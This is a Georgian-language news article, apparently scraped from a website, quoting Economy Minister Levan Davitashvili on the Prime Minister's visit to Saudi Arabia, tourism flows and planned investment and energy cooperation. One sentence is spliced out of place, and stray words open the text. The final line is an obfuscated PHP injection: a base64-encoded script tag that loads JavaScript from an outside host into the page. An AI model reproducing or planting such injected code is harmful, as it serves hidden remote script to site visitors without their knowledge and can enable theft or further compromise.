celsiusi
ავერსი შნაიდერი
საუდის არაბეთში პრემიერ-მინისტრის ვიზიტი შეიძლება შეფასდეს, როგორც განსაკუთრებული ეკონომიკური მნიშვნელობის ჩვენი ქვეყნისთვის, – ამის შესახებ ეკონომიკისა და მდგრადი განვითარების მინისტრმა, ლევან დავითაშვილმა განაცხადა.
„პრემიერ-მინისტრის ხელმძღვანელობით, მიმდინარე წელს შედგა უმაღლესი დონის ვიზიტები სპარსეთის ყურის ძირითად ეკონომიკებში, ძირითად ქვეყნებში. თქვენ იცით, რომ, პრემიერ-მინისტრის ხელმძღვანელობით, ჩვენ ვეწვიეთ კატარს, ემირატებს. ძალიან მნიშვნელოვანი იყო ჩვენთვის სპარსეთის ყურის ყველაზე დიდ ეკონომიკაში, ყველზე დიდ ქვეყანაში უმაღლესი დონის ვიზიტი. შესაბამისად, ვიზიტი შეიძლება შეფასდეს, როგორც განსაკუთრებული ეკონომიკური მნიშვნელობის ჩვენი ქვეყნისთვის. შეხვედრა შედგა საქართველოს პრემიერ-მინისტრსა და საუდის არაბეთის პრემიერ-მინისტრს, ტახტის მემკვიდრეს შორის, განვიხილეთ ეკონომიკური თანამშრომლობის ძალიან ბევრი მიმართულება“, – აღნიშნა დავითაშვილმა.
„ჩვენ ვისაუბრეთ გაზრდილ ტურიზმზე საქართველოში და ტურისტულ სფეროშიეკონომიკის მინისტრის თქმით, სპარსეთის ყურის ეკონომიკას გააჩნია ძალიან დიდი პოტენციალი საქართველოსთან თანამშრომლობის.
 თანამშრომლობაზე. ვისაუბრეთ ასევე ინვესტიციებზე. ეს არის ყველაზე დიდი ეკონომიკა და მას გააჩნია დიდი ინტერესი და შესაძლებლობა, რომ საქართველოს ეკონომიკაში მნიშვნელოვანი წვლილი შეიტანოს ინვესტიციების განხორციელების თვალსაზრისით. ვისაუბრეთ სხვადასხვა სექტორულ მიმართულებებზე, როგორებიც არის ენერგეტიკა, ვაჭრობა. ამ მიმართულებითაც ორ ქვეყანას შორის თანამშრომლობის ძალიან დიდი პოტენციალი არსებობს.
ვფიქრობ, ვიზიტი არის ძალიან წარმატებული, რადგან ვიზიტის შედეგად იქნა გადაწყვეტილება მიღებული, რომ პრემიერების მხრიდან შეიქმნას ერთობლივი სამუშაო ჯგუფები სხვადასხვა დარგობრივი მიმართულებით, წელიწადში ორჯერ მოხდეს ანგარიშგება უშუალოდ პრემიერების მიმართ იმისთვის, რომ პრაქტიკული შედეგები მივიღოთ ამ ვიზიტიდან გამომდინარე. ანუ ეს ვიზიტი უნდა იყოს ხელშესახები კონკრეტული ეკონომიკური შედეგებით. ჩვენთვის ეს არის ყველაზე მეტად მნიშვნელოვანი.
ვიზიტისას ასევე პოლიტიკურ ვითარებასაც შევეხეთ. საქართველო და საუდის არაბეთი ყველა საერთაშორისო პოლიტიკურ პლატფორმაში ერთმანეთთან თანამშრომლობენ. ჩვენ გვაქვს ურყევი მხარდაჭერა საქართველოს ტერიტორიული მთლიანობის და დამოუკიდებლობის. ეს არის წინაპირობები იმისა, რომ საქართველომ საუდის არაბეთთან თანამშრომლობით მიიღოს ხელშესახები შედეგები. ჩვენ ველოდებით უცხოურ ინვესტიციებს, გაზრდილ სავაჭრო ბრუნვას, გაზრდილ ტურისტულ ნაკადებს. ეს ყველაფერი უნდა იყოს შეუქცევადი და იმ თანამშრომლობის ჩარჩოებში, რომელზეც უმაღლეს დონეზე იქნა შეთანხმება მიღწეული“, – განაცხადა დავითაშვილმა.
ამასთან, მისივე თქმით, საუდის არაბეთი ერთ-ერთი ყველაზე დიდი ეკონომიკაა.
„საუდის არაბეთს ტრილიონზე მეტი მთლიანი შიდა პროდუქტი აქვს და, შესაბამისად, დიდი შანსი და პოტენციალია საქართველოსთან თანამშრომლობით. ამავე დროს, ძალიან მნიშვნელოვანია, რომ სპარსეთის ყურე ჩვენი სამიზნე ბაზარია, რადგან, გეოგრაფიული მდებარეობიდან გამომდინარე, ხელსაყრელია ტურისტული ნაკადების მოზიდვა საქართველოში. განსაკუთრებით, ზაფხულის სეზონზე. ეს არის მთიანი და ტყიანი რესურსებით მდიდარი ქვეყანა. შესაბამისად, ეს არის ერთ-ერთი მიმზიდველი ფაქტორი ტურისტებისთვის. დაახლოებით 200 ათასამდე ტურისტი გვყავს და ეს არის მზარდი დინამიკა. 40-ზე მეტი ფრენა გვაქვს საუდის არაბეთთან. ეს პოზიტიური დინამიკა კიდევ უნდა გაგრძელდეს. ამაზეა საუბარი ჩვენს კოლეგებთან. რაც შეეხება ინვესტიციებს, საინვესტიციო კუთხით ვასრულებთ უმნიშვნელოვანეს შეთანხმებას ინვესტიციების დაცვისა და აღიარების შესახებ. ეს იქნება მნიშვნელოვანი წინაპირობა, რომ წავახალისოთ ინვესტიციები საუდის არაბეთიდან. დღეს უკვე წარმატებით ხდება უძრავ ქონებაში ინვესტიციები, თუმცა ჩვენ ვსაუბრობდით უფრო მნიშვნელოვან მსხვილ პროექტებზე, ერთობლივ თანამშრომლობაზე სხვადასხვა სფეროში. ისეთში, როგორიც არის ენერგეტიკა. იცით, რომ საუდის არაბეთი ძალიან წარმატებულია არა მხოლოდ ტრადიციული ენერგორესურსების წარმოებისა და ექსპორტის კუთხით, არამედ განახლებადი ენერგიების განხორციელების კუთხით მათ გამოცდილება აქვთ და გააჩნიათ რესურსები. ჩვენი მოლოდინია, რომ სწორედ განახლებადი ენერგიის ფლაგმან მსხვილ პროექტებში გვეყოლება საუდის არაბეთიდან ინვესტორები. ასევე, ისეთ მნიშვნელოვან სტრატეგიულ პროექტებში, რომლებიც ზრდის ქვეყნის დაკავშირებადობას ევროპასთან. თქვენ ნახეთ, რომ საუდის არაბეთის წარმომადგენლებმა გამოთქვეს ძალიან დიდი სურვილი და მათ შორის ამაზე იყო საუბარი პრემიერ-მინისტრების შეხვედრის დროსაც“, – განაცხადა ლევან დავითაშვილმა.
414
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");